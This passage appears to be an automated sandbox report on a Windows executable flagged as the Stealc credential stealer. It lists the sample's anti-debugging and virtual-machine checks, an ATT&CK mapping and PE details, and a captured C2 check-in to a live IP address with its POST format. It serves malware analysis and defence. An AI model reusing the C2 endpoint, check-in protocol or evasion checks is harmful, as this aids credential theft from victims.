                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_006BEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006BDF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B1160 GetSystemInfo,ExitProcess,0_2_006B1160
                Source: file.exe, file.exe, 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1763680233.00000000014A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: file.exe, 00000000.00000002.1763680233.00000000014DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
                Source: file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1763680233.00000000014D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareh
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36333
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36338
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36318
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36321
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36373
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36207
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B4610 VirtualProtect ?,00000004,00000100,000000000_2_006B4610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006C9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C9AA0 mov eax, dword ptr fs:[00000030h]0_2_006C9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_006C7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_006C9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_006C98E0
                Source: file.exe, file.exe, 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: fProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F75A8 cpuid 0_2_006F75A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_006C7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_006C7B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_006C79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_006C7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.6b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1722686699.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.6b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1722686699.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.206/wsfile.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.phpufile.exe, 00000000.00000002.1763680233.00000000014A3000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206Xfile.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/efile.exe, 00000000.00000002.1763680233.00000000014B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1722686699.000000000510B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1546463
                                Start date and time:2024-10-31 23:46:05 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 0s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:1
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 124
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/746f34465cf17784/sqlite3.dll
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                ykDoK8BtxW.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                ykDoK8BtxW.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.960550122218739
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:2'118'656 bytes
                                MD5:0851a659097fb0251ff585c552f6673d
                                SHA1:b3f95ea7672be4a71e2c5c6b19efd44b26d9d757
                                SHA256:045bfda1e383466d58bfe5dec775188ff592de16671dc6da7bf9c8fadba3ccba
                                SHA512:eff17b0e24917ac7e54a310882a8e4829989c2c3f3e96ec658c0e20b12ad2ef646ef5fa968e68dc7d35a48589433e5f5aefa7395c9120c664599232d877cd1bb
                                SSDEEP:49152:3QyjudgC7L7BHg2t1IL2YYsylbyGcmVByYZ/:3Qyadd7HBHeQBFy+VByYZ/
                                TLSH:0AA533C9DD201626C85E4D71569F5BBAA0BB82902FF8615071059FF78BEFCB011F88A3
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

                                Entrypoint:0xb23000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007FE7848FF50Ah
                                rdmsr
                                and byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                jmp 00007FE784901505h
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+eax], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                and dword ptr [eax], eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [eax+00000000h], eax
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 00h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, byte ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                inc eax
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], cl
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add bh, bh
                                inc dword ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], cl
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x2e70000x676004e3881e7b069551aa4f74428a49b096aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x2ea0000x29d0000x200af335edf61eb6651a1d3f80ef2f02e7aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                aslwbrhj0x5870000x19b0000x19a2003d03c197d5c803721fa8f9641102f247False0.9949668784288327data7.95370802823853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                bqvglmea0x7220000x10000x6004c7b22e86c394994767aa123cae6f34bFalse0.58203125data4.960012819839788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x7230000x30000x2200bde373344fdacad3aad9aa511860a34bFalse0.07295496323529412DOS executable (COM)0.951462676811214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-31T23:47:05.311987+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 31, 2024 23:47:04.113292933 CET4973080192.168.2.4185.215.113.206
                                Oct 31, 2024 23:47:04.118361950 CET8049730185.215.113.206192.168.2.4
                                Oct 31, 2024 23:47:04.118448973 CET4973080192.168.2.4185.215.113.206
                                Oct 31, 2024 23:47:04.118606091 CET4973080192.168.2.4185.215.113.206
                                Oct 31, 2024 23:47:04.124362946 CET8049730185.215.113.206192.168.2.4
                                Oct 31, 2024 23:47:05.023514032 CET8049730185.215.113.206192.168.2.4
                                Oct 31, 2024 23:47:05.023600101 CET4973080192.168.2.4185.215.113.206
                                Oct 31, 2024 23:47:05.025688887 CET4973080192.168.2.4185.215.113.206
                                Oct 31, 2024 23:47:05.031337023 CET8049730185.215.113.206192.168.2.4
                                Oct 31, 2024 23:47:05.311922073 CET8049730185.215.113.206192.168.2.4
                                Oct 31, 2024 23:47:05.311986923 CET4973080192.168.2.4185.215.113.206
                                Oct 31, 2024 23:47:07.836792946 CET4973080192.168.2.4185.215.113.206

                                HTTP Request Dependency Graph

                                • 185.215.113.206

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449730185.215.113.206807116C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Oct 31, 2024 23:47:04.118606091 CET90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 31, 2024 23:47:05.023514032 CET203INHTTP/1.1 200 OK
                                Date: Thu, 31 Oct 2024 22:47:04 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 31, 2024 23:47:05.025688887 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 33 36 36 31 33 36 31 41 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 2d 2d 0d 0a
                                Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="hwid"A03661361A012263180025------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="build"tale------FIEHDBGDHDAECBGDHJKF--
                                Oct 31, 2024 23:47:05.311922073 CET210INHTTP/1.1 200 OK
                                Date: Thu, 31 Oct 2024 22:47:05 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:18:47:00
                                Start date:31/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x6b0000
                                File size:2'118'656 bytes
                                MD5 hash:0851A659097FB0251FF585C552F6673D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
